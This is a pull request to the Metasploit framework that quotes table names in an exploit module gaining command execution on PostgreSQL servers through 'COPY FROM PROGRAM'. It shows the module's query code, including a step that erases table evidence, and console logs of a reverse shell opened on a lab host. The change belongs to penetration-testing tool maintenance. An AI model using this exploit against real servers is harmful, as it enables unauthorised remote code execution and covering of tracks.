### PR TITLE
postgres_copy_from_program_cmd_exec: Quote table name

### DIFF
--- a/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
+++ b/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_payload
     # Drop table if it exists
-    query = "DROP TABLE IF EXISTS #{tablename};"
+    query = "DROP TABLE IF EXISTS #{tablename.inspect};"
     drop_query = postgres_query(query)
     case drop_query.keys[0]
     when :conn_error
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Create Table
-    query = "CREATE TABLE #{tablename}(filename text);"
+    query = "CREATE TABLE #{tablename.inspect}(filename text);"
     create_query = postgres_query(query)
     case create_query.keys[0]
     when :conn_error
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Copy Command into Table
     cmd_filtered = payload.encoded.gsub("'", "''")
-    query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
+    query = "COPY #{tablename.inspect} FROM PROGRAM '#{cmd_filtered}';"
     copy_query = postgres_query(query)
     case copy_query.keys[0]
     when :conn_error
@@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['DUMP_TABLE_OUTPUT']
     # Select output from table for debugging
-      query = "SELECT * FROM #{tablename};"
+      query = "SELECT * FROM #{tablename.inspect};"
       select_query = postgres_query(query)
       case select_query.keys[0]
       when :conn_error
@@ -199,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
     # Clean up table evidence
-    query = "DROP TABLE IF EXISTS #{tablename};"
+    query = "DROP TABLE IF EXISTS #{tablename.inspect};"
     drop_query = postgres_query(query)
     case drop_query.keys[0]
     when :conn_error


### PR DESCRIPTION
In about 16% of all cases the random value of "tablename" will be set to
a value starting with a number, which needs to be quoted before the
query is sent to the postgres server. Otherwise the query fails with the
message "Exploit failed". This is what happened to me, you can see an
example with a table name set manually here:

    msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
    [*] Using configured payload cmd/unix/reverse_perl
    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.2.2
    RHOSTS => 192.168.2.2
    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set tablename 123test
    tablename => 123test
    [...]
    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

    [*] Started reverse TCP handler on 192.168.2.1:4444·
    [*] 192.168.2.2:5432 - 192.168.2.2:5432 - PostgreSQL [...]
    [*] 192.168.2.2:5432 - Exploiting...
    [!] 192.168.2.2:5432 - 192.168.2.2:5432 - Unable to execute query: DROP TABLE IF EXISTS 123test;
    [-] 192.168.2.2:5432 - Exploit Failed

This can be verified manually as follows, quoting the table name works:

    $ psql --user postgres -W -h 192.168.2.2 template1
    [...]
    template1=# DROP TABLE IF EXISTS 123test;
    ERROR:  syntax error at or near "123"
    LINE 1: DROP TABLE IF EXISTS 123test;
                                 ^
    template1=# DROP TABLE IF EXISTS "123test";
    NOTICE:  table "123test" does not exist, skipping
    DROP TABLE

With the patch, the script also works with table names which start with
numbers:

    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

    [*] Started reverse TCP handler on 192.168.2.1:4444
    [*] 192.168.2.2:5432 - 192.168.2.2:5432 - PostgreSQL [...]
    [*] 192.168.2.2:5432 - Exploiting...
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test dropped successfully
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test created successfully
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test copied successfully(valid syntax/command)
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test dropped successfully(Cleaned)
    [*] 192.168.2.2:5432 - Exploit Succeeded

    [*] Command shell session 1 opened (192.168.2.1:4444 -> 192.168.2.2:51734 ) at 2022-03-24 10:15:33 +0100

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/postgres/postgres_copy_from_program_cmd_exec`
- [ ] configure postgres server: `set RHOSTS 192.168.2.2`
- [ ] set tablename manually to start with a number: `set tablename 123test`
- [ ] run script, it fails with `Exploit failed`
- [ ] apply patch
- [ ] run script again, succeeds, shell is opened
